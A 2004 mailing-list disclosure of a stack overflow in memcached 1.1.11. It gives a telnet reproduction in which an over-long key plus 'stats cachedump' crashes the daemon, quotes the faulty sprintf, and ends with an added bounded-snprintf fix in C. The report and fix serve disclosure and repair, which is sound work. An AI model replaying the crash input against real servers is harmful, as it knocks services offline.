remote stack overflow in memcached-1.1.11

Andrei Nigmatulin anight@monamour.ru
Thu, 22 Jul 2004 16:44:04 +0400


Hello,

Just found a generic stack overflow in memcached; it's easily reproducible:

> telnet localhost 11211
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
add
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq 0 0 0
STORED
stats cachedump 9 100000
Connection closed by foreign host.

memcached daemon dies with segmentation fault message.

The bug lays here:

char *item_cachedump(unsigned int slabs_clsid, unsigned int limit,
unsigned int *bytes) {
...
    char temp[256];
...
        sprintf(temp, "ITEM %s [%u b; %lu s]\r\n", ITEM_key(it),
it->nbytes - 2, it->time);

While the maximum key length is 250 bytes, it is possible to overflow the stack
variable temp and maybe even execute arbitrary code (not checked at
this moment).

--
Andrei Nigmatulin
GPG PUB KEY 6449830D


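As an added example (not from the report above and not memcached's own source), this is the bounded formatting a fix for this line would use: snprintf reports the length the full line would need, so an over-long key is detected instead of being written past a fixed temp[256]. The item struct and the CACHEDUMP_LINE_MAX figure are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the item header: only the fields the
 * cachedump line uses (key, nbytes, time). Not memcached's real struct. */
struct item_view {
    const char *key;        /* NUL-terminated key, up to 250 bytes */
    unsigned int nbytes;
    unsigned long time;
};

/* Worst case for "ITEM <key> [<nbytes-2> b; <time> s]\r\n" with a 250-byte
 * key: 5 + 250 + 2 + 10 + 4 + 20 + 5 = 296 bytes, i.e. more than temp[256]. */
#define CACHEDUMP_LINE_MAX 296

/* Bounded replacement for the sprintf call in the report: writes the line
 * into buf and returns its length, or -1 if it would not fit in bufsz.
 * snprintf returns the length the complete line needed, so the check
 * catches truncation instead of silently emitting a partial line. */
int format_cachedump_line(char *buf, size_t bufsz, const struct item_view *it)
{
    int n = snprintf(buf, bufsz, "ITEM %s [%u b; %lu s]\r\n",
                     it->key, it->nbytes - 2, it->time);
    if (n < 0 || (size_t)n >= bufsz)
        return -1;   /* this is the case that overflowed temp[256] */
    return n;
}

/* Demonstration with the 250-byte key from the report: the original 256-byte
 * buffer is rejected, a buffer sized for the worst case holds the line.
 * Returns the real line length (277 for this input) when both behave. */
int demo_overflow_detected(void)
{
    char key[251];
    memset(key, 'q', 250);
    key[250] = '\0';
    struct item_view it = { key, 2, 4294967295UL }; /* nbytes 2 -> "0 b" */
    char small[256], big[CACHEDUMP_LINE_MAX + 1];
    int r_small = format_cachedump_line(small, sizeof small, &it);
    int r_big = format_cachedump_line(big, sizeof big, &it);
    return (r_small == -1 && r_big > 0) ? r_big : -1;
}
```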